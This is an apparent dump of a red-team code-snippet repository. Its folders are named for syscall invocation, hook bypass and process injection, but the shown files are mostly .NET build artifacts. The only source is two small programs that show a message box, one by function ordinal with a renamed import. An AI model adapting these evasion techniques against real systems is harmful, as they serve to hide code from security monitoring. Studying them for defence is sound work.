"name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke_Syscalls\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268 2 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | b31ed79f3e4190b809f1aa8db22f513b40fba58a 2 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "idqgkXj4YR79iFvMjG/5hb5UhChBxPT5UUcFWEq/bFVUqYDfRbpnPsOPfseDkfNQniGO0Ynq1BYiK5kkuK29aA==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\DIvoke_Syscalls\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | 10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "dependencies": { 11 | "DInvoke": "1.0.0.0" 12 | }, 13 | "runtime": { 14 | "ConsoleApp1.dll": {} 15 | } 16 | }, 17 | "DInvoke/1.0.0.0": { 18 | "runtime": { 19 | "DInvoke.dll": { 20 | "assemblyVersion": "1.0.0.0", 21 | "fileVersion": "1.0.0.0" 22 | } 23 | } 24 | } 25 | } 26 | }, 27 | "libraries": { 28 | "ConsoleApp1/1.0.0": { 29 | "type": "project", 30 | "serviceable": false, 31 | "sha512": "" 32 | }, 33 | "DInvoke/1.0.0.0": { 34 | "type": "reference", 35 | "serviceable": false, 36 | "sha512": "" 37 | } 38 | } 39 | } -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\HookBypass\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268 2 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | ee34b10399e914a8aedc3d5bcc7c2cad3704dcb8 2 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "Qa6dvrVwNTxdRmvSiTGiddzLTnQou+7/9KlhkWeN3bCzmLieRFrfYHHUPK9NFcoZBQzQag36RTDJtgYLvXGWOg==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\HookBypass\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/HookBypass/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/Ordinal/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace Ordinals 5 | { 6 | internal class Program 7 | { //WE USE PEVIEW -> SECTION .TEXT -> EXPORT ADDRESS TABLE -> MESSAGEBOXW TO FIND ORDINAL 0X0874 -> 2164 8 | [DllImport("user32.dll", EntryPoint = "#2164", CharSet = CharSet.Unicode)] 9 | static extern int NotAMessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType); 10 | 11 | static void Main(string[] args) 12 | { 13 | NotAMessageBox(IntPtr.Zero, "Ordinal!!", "Ordinal", 0); 14 | } 15 | 16 | } 17 | 18 | 19 | } -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "message_box_ordinal/1.0.0": { 10 | "runtime": { 11 | "message_box_ordinal.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "message_box_ordinal/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.dll -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.exe -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.pdb -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/message_box_ordinal.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 812328a406d511f0cb86ca1de9b6c979e8ce68f5 2 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = message_box_ordinal 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\message_box_ordinal\message_box_ordinal\ 4 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.assets.cache -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 94ce58349191cbc449fdb3720ceffeb425f4bcfd 2 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.dll -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 46fa7d9c7209793a53c6eecb31254525cde9465c 2 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.pdb -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/message_box_ordinal.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "n5d2sI7PqLshZtvMBRBPM2qNVlUVNYYAUTAH+ZMLHmHyoGv2yIjUZjDc77tEFY16/f0OCJ+2eQ8tm1h8ABO9rQ==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\message_box_ordinal\\message_box_ordinal\\message_box_ordinal.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/PInvoke.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace PInvoke 5 | { 6 | internal class Program 7 | { 8 | [DllImport("user32.dll", CharSet = CharSet.Unicode)] 9 | static extern int MessageBoxW(IntPtr hWnd, string lpText, string lpCaption, uint uType); 10 | 11 | static void Main(string[] args) 12 | { 13 | MessageBoxW(IntPtr.Zero, "My first P/Invoke", "Hello World!", 0); 14 | } 15 | 16 | } 17 | 18 | 19 | } -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "PInvoke/1.0.0": { 10 | "runtime": { 11 | "PInvoke.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "PInvoke/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.dll -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.exe -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.pdb -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 9e757931411dfb9bdddde4d3b5e0787e30c22b30 2 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = PInvoke 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\PInvoke\PInvoke\ 4 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.assets.cache -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | fc9c814ed963a5f84495ebe65f08a3299e1d96f2 2 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.dll -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 9ef52f5bd7f4cff3d652c0e7935269a83934d959 2 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.pdb -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/PInvoke.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "yDtPFkmmK0x6Bj1ejJZrdurmesNI0rv96zUDh+/MJumZu2Dpwe/87a+H9GWhqp47DKyxck1DYE+fN/Hh/cSLjg==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\PInvoke\\PInvoke\\PInvoke.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/PInvoke/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "runtime": { 11 | "ConsoleApp1.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "ConsoleApp1/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- 